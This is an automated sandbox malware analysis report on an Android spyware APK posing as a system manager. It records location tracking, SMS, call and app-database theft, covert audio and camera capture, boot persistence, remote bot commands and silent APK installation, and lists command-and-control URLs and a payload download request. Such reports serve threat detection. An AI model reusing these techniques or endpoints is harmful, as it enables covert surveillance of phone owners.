Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 484648
Start time: 13:17:58
Joe Sandbox Product: Cloud
Start date: 19.01.2018
Overall analysis duration: 0h 5m 49s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: uWmj1BwP9K
Cookbook file name: defaultandroidfilecookbook.jbs
Analysis system description: Android x86 5.1
Detection: MAL
Classification: mal80.expl.spyw.troj.and@0/251@3/0
Warnings:
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Report size exceeded maximum capacity and may have missing dynamic data code.


Detection

Strategy  | Score | Range   | Reporting      | Detection
Threshold | 80    | 0 - 100 | Report FP / FN | malicious


Classification

Signature Overview


Change of System Appearance:

Acquires a wake lock
Source: com.sysmanager.MessageManagement;->onMessageReceived:751 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.sysmanager.system.AndroidAlarmManager;->onCreate:27 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.sysmanager.system.AndroidSystemQueues;->onCreate:109 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.sysmanager.system.AndroidSystemService;->onCreate:207 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.sysmanager.system.MovementDetector;->start:40 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.sysmanager.system.RegistrationService;->onCreate:101 | API Call: android.os.PowerManager$WakeLock.acquire
Source: com.google.android.gms.internal.zzbay;->acquire:64 | API Call: android.os.PowerManager$WakeLock.acquire
May access the Android keyguard (lock screen)
Source: classes.dex | String found in binary or memory: Landroid/app/KeyguardManager;
Source: classes.dex | String found in binary or memory: inKeyguardRestrictedInputMode
Source: classes.dex | String found in binary or memory: keyguard
Source: classes.dex | String found in binary or memory: Landroid/app/KeyguardManager;)Landroid/app/Notification$Action$Builder;!Landroid/app/Notification$Action;*Landroid/app/Notification$BigPictureStyle;'Landroid/app/Notification$BigTextStyle;"Landroid/app/Notification$Builder;%Landroid/app/Notification$InboxStyle;1Landroid/app/Notification$MessagingStyle$Message;)Landroid/app/Notification$MessagingStyle; Landroid/app/Notification$Style;
Source: android | String found in binary or memory: keyguard

Location Tracing:

Queries the phone's location (GPS)
Source: com.sysmanager.system.AndroidSystemQueues;->sendLocNow:33 | API Call: android.location.Location.getLatitude
Source: com.sysmanager.system.AndroidSystemQueues;->sendLocNow:36 | API Call: android.location.Location.getLongitude
Source: com.sysmanager.system.FetchAddressIntentService;->deliverResultToReceiver:6 | API Call: android.location.Location.getLatitude
Source: com.sysmanager.system.FetchAddressIntentService;->deliverResultToReceiver:10 | API Call: android.location.Location.getLongitude
Source: com.sysmanager.system.FetchAddressIntentService;->onHandleIntent:83 | API Call: android.location.Location.getLatitude
Source: com.sysmanager.system.FetchAddressIntentService;->onHandleIntent:85 | API Call: android.location.Location.getLongitude

Operating System Destruction:

Lists and deletes files in the same context
Source: okhttp3.internal.io.FileSystem$1;->deleteContents:23 | API Calls in same method context: File.listFiles, File.delete
Source: com.google.android.gms.internal.zzw;->initialize:131 | API Calls in same method context: File.listFiles, File.delete
Source: com.sysmanager.system.AndroidAlarmManager$1;->run:29 | API Calls in same method context: File.listFiles, File.delete
Source: com.sysmanager.storage.DeleteApkFiles;->doInBackground:12 | API Calls in same method context: File.listFiles, File.delete
Source: com.sysmanager.system.AndroidMDMSupport$1;->run:78 | API Calls in same method context: File.listFiles, File.delete
Source: com.sysmanager.system.AndroidSystemService;->copyPendingAudio:62 | API Calls in same method context: File.listFiles, File.delete

Spam, unwanted Advertisements and Ransom Demands:

Has permissions to monitor, redirect and/or block calls
Source: submitted apk | Request permission: android.permission.PROCESS_OUTGOING_CALLS
May check for popular installed apps
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.orca/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.katana/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.whatsapp/databases/"
Source: Lcom/google/android/gms/common/zzg;->isGooglePlayServicesAvailable(Landroid/content/Context;)I | Method string: "com.android.vending"
May use Google Cloud Messaging (GCM) or Google's Cloud to Device Messaging (C2DM) services
Source: submitted apk | Request permission: com.sysmanager.permission.C2D_MESSAGE

Privilege Escalation:

Checks if the device administrator is active
Source: com.sysmanager.system.AccessibilityService;->onAccessibilityEvent:42 | API Call: android.app.admin.DevicePolicyManager.isAdminActive
Starts an activity on device admin enabled
Source: com.sysmanager.system.AndroidDeviceAdministrator;->onDisabled:5 | API Call: android.content.Context.startActivity (not executed)
Tries to add a new device administrator
Source: com.sysmanager.Administrator;->requestAdminConfirm:10 | API Call: android.content.Intent.<init> android.app.action.ADD_DEVICE_ADMIN

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Accesses the audio/media managers
Source: com.sysmanager.system.AndroidSystemService;->startRecording:91 | API Call: android.media.MediaRecorder.<init>
Has permission to record audio in the background
Source: submitted apk | Request permission: android.permission.RECORD_AUDIO
Has permission to take photos
Source: submitted apk | Request permission: android.permission.CAMERA
Records audio/media
Source: com.sysmanager.system.AndroidSystemService;->startRecording:115 | API Call: android.media.MediaRecorder.start

E-Banking Fraud:

Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
May check for popular installed apps
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.orca/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.katana/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.whatsapp/databases/"
Source: Lcom/google/android/gms/common/zzg;->isGooglePlayServicesAvailable(Landroid/content/Context;)I | Method string: "com.android.vending"
May query for the most recent running application (usually for UI overlaying)
Source: com.sysmanager.system.AudioController;->foregroundApp | getRunningTasks and getPackageName invocations in same method: com.sysmanager.system.AudioController;->foregroundApp:94, com.sysmanager.system.AudioController;->foregroundApp:97

Networking:

Found strings which match known social media URLs
Source: classes.dex | String found in binary or memory: '/data/data/com.facebook.orca/databases/ equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: (/data/data/com.facebook.mlite/databases/ equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: )/data/data/com.facebook.katana/databases/ equals www.facebook.com (Facebook)
Source: classes.dex | String found in binary or memory: /cmdline)/data/data/com.facebook.katana/databases/(/data/data/com.facebook.mlite/databases/'/data/data/com.facebook.orca/databases/+/data/data/com.google.android.gm/databases/"/data/data/com.whatsapp/databases/ equals www.facebook.com (Facebook)
Source: android | String found in binary or memory: /data/data/com.facebook.katana/databases/ equals www.facebook.com (Facebook)
Source: android | String found in binary or memory: /data/data/com.facebook.mlite/databases/ equals www.facebook.com (Facebook)
Source: android | String found in binary or memory: /data/data/com.facebook.orca/databases/ equals www.facebook.com (Facebook)
Source: classes.dex, android | String found in binary or memory: facebook equals www.facebook.com (Facebook)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: url.plus
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /Updates/startup.x86.zip HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; VirtualBox Build/LMY48W)
    Host: url.plus
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 19 Jan 2018 12:19:16 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Content-Length: 1
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 20
    Data Ascii:
URLs found in memory or binary data
Source: classes.dex, android | String found in binary or memory: http://
Source: common_google_signin_btn_text_light.xml | String found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, android | String found in binary or memory: http://url.plus/
Source: classes.dex, android | String found in binary or memory: http://url.plus/Updates/
Source: classes.dex | String found in binary or memory: http://url.plus/Updates/&http://url.plus/Updates/agent/commands
Source: classes.dex, android | String found in binary or memory: http://url.plus/Updates/agent/commands
Source: android | String found in binary or memory: http://url.plus/Updates/startup.x86.zip
Source: classes.dex, android | String found in binary or memory: http://url.plus/app/pro/
Source: classes.dex, android | String found in binary or memory: http://url.plus/app/pro/last.php
Source: classes.dex | String found in binary or memory: http://url.plus/app/pro/last.php$http://url.plus/app/pro/register.php
Source: classes.dex, android | String found in binary or memory: http://url.plus/app/pro/register.php
Source: classes.dex, android | String found in binary or memory: http://url.plus/app/pro/req_server_key.php
Source: classes.dex, android | String found in binary or memory: http://url.plus/app/pro/ser.php
Source: classes.dex, android | String found in binary or memory: https://
Source: classes.dex, android | String found in binary or memory: https://app-measurement.com/a
Source: classes.dex | String found in binary or memory: https://app-measurement.com/aAhttps://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: resources.arsc, android | String found in binary or memory: https://future-8a57f.firebaseio.com
Source: classes.dex, android | String found in binary or memory: https://goo.gl/NAOOOI
Source: classes.dex, android | String found in binary or memory: https://goo.gl/NAOOOI.
Source: classes.dex, android | String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=gmob-apps
Source: classes.dex, android | String found in binary or memory: https://plus.google.com/
Source: classes.dex, android | String found in binary or memory: https://www.google.com
Source: classes.dex | String found in binary or memory: https://www.google.com(https://www.googleapis.com/auth/appstate/https://www.googleapis.com/auth/data
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/appstate
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/datastoremobile
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/drive.appdata
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/drive.file
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/drive.file5https://www.googleapis.com/auth/fitness.activity.read6htt
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.activity.read
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.activity.write
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.body.read
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.body.write
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.location.read
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.location.write
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.read
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.write
Source: classes.dex, android | String found in binary or memory: https://www.googleapis.com/auth/games
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/plus.login
Source: classes.dex | String found in binary or memory: https://www.googleapis.com/auth/plus.me
Uses HTTP for connecting to the internet
Source: com.sysmanager.network.StartReverse;->doInBackground:83 | API Call: com.android.okhttp.internal.http.HttpURLConnectionImpl.connect
Source: com.sysmanager.network.GetCommands;->doInBackground:37 | API Call: java.net.HttpURLConnection.connect
Source: com.sysmanager.network.InstallApk;->doInBackground:69 | API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.internal.zzaty$zzc;->run:43 | API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.internal.zzx;->zza:61 | API Call: org.apache.http.client.HttpClient.execute
Checks whether an internet connection is available
Source: com.sysmanager.system.RegistrationService;->requestGWKey:134 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.sysmanager.system.RegistrationService;->requestGWKey:134 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.firebase.iid.FirebaseInstanceIdService;->zzct:86 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.firebase.iid.FirebaseInstanceIdService;->zzct:87 | API Call: android.net.NetworkInfo.isConnected
Source: com.sysmanager.network.NetworkUtil;->getConnectivityStatus:4 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.sysmanager.network.NetworkUtil;->getConnectivityStatus:5 | API Call: android.net.NetworkInfo.isConnected
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:225 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:227 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:228 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:230 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:231 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:232 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:257 | API Call: android.net.NetworkInfo.isAvailable
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:259 | API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:262 | API Call: android.net.NetworkInfo.isAvailable
Source: com.sysmanager.system.AndroidSystemCall;->networkInfo:264 | API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: com.sysmanager.system.UpdateConnectivity;->onReceive:4 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.sysmanager.system.UpdateConnectivity;->onReceive:5 | API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.internal.zzaty;->zzqa:63 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzaty;->zzqa:64 | API Call: android.net.NetworkInfo.isConnected
Enables or disables WIFI
Source: com.sysmanager.MessageManagement;->addWifiConfig:27 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Source: com.sysmanager.MessageManagement;->wifiManageConfiguration:711 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Source: com.sysmanager.system.SmsReceiver;->onReceive:26 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Source: com.sysmanager.system.SmsReceiver;->onReceive:49 | API Call: android.net.wifi.WifiManager.setWifiEnabled
Opens an internet connection
Source: com.sysmanager.network.StartReverse;->doInBackground:79 | API Call: java.net.URL.openConnection("http://url.plus/Updates/startup.x86.zip")
Source: com.sysmanager.network.GetCommands;->doInBackground:33 | API Call: java.net.URL.openConnection (not executed)
Source: com.sysmanager.network.InstallApk;->doInBackground:65 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.ads.identifier.zza;->zzu:3 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzaa;->zza:68 | API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzaty;->zzc:45 | API Call: java.net.URL.openConnection (not executed)
Source: okhttp3.internal.platform.AndroidPlatform;->connectSocket:38 | API Call: java.net.Socket.connect (not executed)
Source: okhttp3.internal.platform.Platform;->connectSocket:42 | API Call: java.net.Socket.connect (not executed)
Performs DNS lookups (Java API)
Source: okhttp3.Dns$1;->lookup:4 | API Call: java.net.InetAddress.getAllByName (not executed)
Removes or disables configured WIFI access points
Source: com.sysmanager.MessageManagement;->wifiManageConfiguration:736 | API Call: android.net.wifi.WifiManager.removeNetwork
Source: com.sysmanager.system.SmsReceiver;->onReceive:47 | API Call: android.net.wifi.WifiManager.removeNetwork
Modifies WIFI configuration
Source: com.sysmanager.MessageManagement;->addWifiConfig:26 | API Call: android.net.wifi.WifiManager.saveConfiguration
Source: com.sysmanager.MessageManagement;->wifiManageConfiguration:737 | API Call: android.net.wifi.WifiManager.saveConfiguration
Source: com.sysmanager.system.SmsReceiver;->onReceive:48 | API Call: android.net.wifi.WifiManager.saveConfiguration
Tries to download files via HTTP but all files are no longer available
Source: HTTP Header | HTTP: All HTTP requests resulted in 404 Not Found

Boot Survival:

Has permission to execute code after phone reboot
Source: submitted apk | Request permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to keep the device awake)
Source: com.sysmanager.MessageManagement;->onMessageReceived:750 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.AndroidAlarmManager;->onCreate:23 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.AndroidSystemQueues;->onCreate:105 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.AndroidSystemService;->onCreate:203 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.ClearSystems;->onCreate:9 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.MovementDetector;-><init>:12 | API Call: android.os.PowerManager.newWakeLock
Source: com.sysmanager.system.RegistrationService;->onCreate:97 | API Call: android.os.PowerManager.newWakeLock
Source: com.google.android.gms.internal.zzbay;-><init>:20 | API Call: android.os.PowerManager.newWakeLock
Starts/registers a service/receiver on phone boot (autostart)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:60 | API Call: com.sysmanager.Scontext.startService("Intent { cmp=com.sysmanager/.system.RegistrationService }")
Source: com.sysmanager.OnBootReceiver;->onReceive:85 | API Call: com.sysmanager.Scontext.startService("Intent { cmp=com.sysmanager/.system.AndroidClock }")
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:17 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:20 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:26 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:28 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:41 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:49 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:55 | API Call: android.content.Context.startService (not executed)
Source: com.sysmanager.OnBootReceiver;->loadSharedPreferences:58 | API Call: android.content.Context.startService (not executed)

Remote Access Functionality:

Found suspicious command strings (may be related to BOT commands)
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Method string: "mobileconn"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Method string: "enable_location"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Method string: "location_force"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Method string: "install_apk"
Source: Lcom/google/android/gms/location/places/PlaceReport;->zzeU(Ljava/lang/String;)Z | Method string: "inferredreversegeocoding"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Method string: "send_intent"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Instruction: "lcom/sysmanager/messagemanagement;->mobileconnectionenable(landroid/content/context;)v"
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Instruction: "const-string v3, "enable_location""
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Instruction: "const-string v3, "location_force""
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Instruction: "const-string v5, "install_apk""
Source: Lcom/sysmanager/MessageManagement;->parseCommand(Landroid/content/Context;Ljava/util/Map;)V | Instruction: "const-string v5, "send_intent""
Source: Lcom/google/android/gms/location/places/PlaceReport;->zzeU(Ljava/lang/String;)Z | Instruction: "const-string v3, "inferredreversegeocoding""

Stealing of Sensitive Information:

Has permission to query the current location
Source: submitted apk | Request permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apk | Request permission: android.permission.ACCESS_FINE_LOCATION
Creates SMS data (e.g. PDU)
Source: com.sysmanager.system.SmsReceiver;->onReceive:14 | API Call: android.telephony.SmsMessage.createFromPdu
Has permission to read contacts
Source: submitted apk | Request permission: android.permission.READ_CONTACTS
Has permission to read the SMS storage
Source: submitted apk | Request permission: android.permission.READ_SMS
Has permission to read the call log
Source: submitted apk | Request permission: android.permission.READ_CALL_LOG
Has permission to read the default browser history
Source: submitted apk | Request permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
Has permission to read the phone's state (phone number, device IDs, active call etc.)
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the background
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Has permissions to create, read or change account settings (including account password settings)
Source: submitted apk | Request permission: android.permission.GET_ACCOUNTS
May spy on facebook database
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.orca/databases/"
Monitors incoming Phone calls
Source: com.sysmanager.CallReceiver | Registered receiver: android.intent.action.PHONE_STATE
Monitors incoming SMS
Source: com.sysmanager.system.SmsReceiver | Registered receiver: android.provider.Telephony.SMS_RECEIVED
Parses SMS data (e.g. originating address)
Source: com.sysmanager.system.SmsReceiver;->onReceive:4 | API Call: android.telephony.SmsManager.getMessageBody
Source: com.sysmanager.system.SmsReceiver;->onReceive:15 | API Call: android.telephony.SmsMessage.getMessageBody
Queries SMS data
Source: com.sysmanager.system.AndroidMessagingService;->GetListaSMS:9 | API Call: android.net.Uri.parse("content://sms")
Queries camera information
Source: com.sysmanager.system.AndroidCamera;->getBackCameraId:7 | API Call: android.hardware.Camera.getNumberOfCameras
Source: com.sysmanager.system.AndroidCamera;->getBackCameraId:9 | API Call: android.hardware.Camera.getCameraInfo
Source: com.sysmanager.system.AndroidCamera;->getFrontCameraId:14 | API Call: android.hardware.Camera.getNumberOfCameras
Source: com.sysmanager.system.AndroidCamera;->getFrontCameraId:16 | API Call: android.hardware.Camera.getCameraInfo
Source: com.sysmanager.system.AndroidCamera;->getCameraInstance:140 | API Call: android.hardware.Camera.open
Queries list of installed packages
Source: com.sysmanager.system.AppsManager;->getInstalledApps:4 | API Call: android.content.pm.PackageManager.getInstalledPackages
Queries stored mail and application accounts (e.g. Gmail or WhatsApp)
Source: com.google.android.gms.common.internal.zzg;->getAccountName:20 | API Call: android.accounts.Account.name
Source: com.google.android.gms.internal.zzbat;->zzPS:8 | API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->zzri:74 | API Call: android.accounts.Account.name
Queries the list of configured WIFI access points
Source: com.sysmanager.MessageManagement;->wifiManageConfiguration:722 | API Call: android.net.wifi.WifiManager.getConfiguredNetworks
Source: com.sysmanager.system.SmsReceiver;->onReceive:39 | API Call: android.net.wifi.WifiManager.getConfiguredNetworks
Redirects camera/video feed
Source: com.sysmanager.system.AndroidSystemService;->startRecording:105 | API Call: android.media.MediaRecorder.setOutputFile
Accesses databases of MDM applications (Facebook, WhatsApp, etc.)
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.orca/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.katana/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.whatsapp/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.google.android.gm/databases/"
Source: Lcom/sysmanager/system/AndroidMDMSupport;-><clinit>()V | Method string: "/data/data/com.facebook.mlite/databases/"
Monitors outgoing Phone calls
Source: com.sysmanager.CallReceiver | Registered receiver: android.intent.action.NEW_OUTGOING_CALL

Persistence and Installation Behavior:

Creates files
Source: com.sysmanager.system.AndroidFileSystem;->write:96 | API Call: java.io.FileWriter.<init>
Source: com.sysmanager.system.FileLog;->write:34 | API Call: java.io.FileWriter.<init>
Has permission to install other packages
Source: submitted apk | Request permission: android.permission.INSTALL_PACKAGES
Sets an intent to the APK data type (used to install other APKs)
Source: com.sysmanager.network.InstallApk;->installApp:40 | API Call: android.content.Intent.setDataAndType(n/a,"application/vnd.android.package-archive")
Uses command line tools to install new APKs
Source: Lcom/sysmanager/network/InstallApk;->installApp(Landroid/content/Context;Ljava/io/File;)V | Method string: pm install -r

Data Obfuscation:

Obfuscates method names
Source: uWmj1BwP9K | Total valid method names: 41%
Uses reflection
Source: com.sysmanager.MessageManagement;->mobileConnectionEnable:297 | API Call: java.lang.reflect.Field.get
Source: com.sysmanager.MessageManagement;->mobileConnectionEnable:306 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.connection.RouteException;->addSuppressedIfPossible:6 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.dynamic.zzd;->zzF:10 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzH:37 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzH:40 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzb:172 | API Call: java.lang.reflect.Field.get
Source: com.google.firebase.FirebaseApp;->zza:154 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzacs;->zzb:101 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzati;->zzLC:49 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzauj;->zzf:532 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzbxu;->zza:20 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzbxu;->zza:39 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzbxu;->zza:47 | API Call: java.lang.reflect.Method.invoke
Source: eu.chainfire.libsuperuser.Shell$SU;->isSELinuxEnforcing:21 | API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:100 | API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:395 | API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzaI:406 | API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zzab:412 | API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zzac:417 | API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zzb:429 | API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzc:452 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$AndroidCertificateChainCleaner;->clean:7 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$CloseGuard;->createAndOpen:13 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$CloseGuard;->createAndOpen:15 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$CloseGuard;->warnIfOpen:17 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform;->isCleartextTrafficPermitted:57 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform;->isCleartextTrafficPermitted:60 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk9Platform;->configureTlsExtensions:12 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk9Platform;->getSelectedProtocol:16 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.JdkWithJettyBootPlatform$JettyNegoProvider;->invoke:30 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.JdkWithJettyBootPlatform;->afterHandshake:30 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.JdkWithJettyBootPlatform;->configureTlsExtensions:39 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.JdkWithJettyBootPlatform;->getSelectedProtocol:42 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.OptionalMethod;->invoke:24 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.OptionalMethod;->invokeOptional:34 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Platform;->readFieldOrNull:30 | API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:17 | API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.tls.TrustRootIndex$AndroidTrustRootIndex;->findByIssuerAndSignature:10 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzz;->zza:26 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzz;->zza:34 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzz;->zza:42 | API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzz;->zza:49 | API Call: java.lang.reflect.Method.invoke
Found very long method strings
Source: Lcom/google/android/gms/common/zzf$zzd$2;->zzvc()[B | Method string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ | Length: 4395

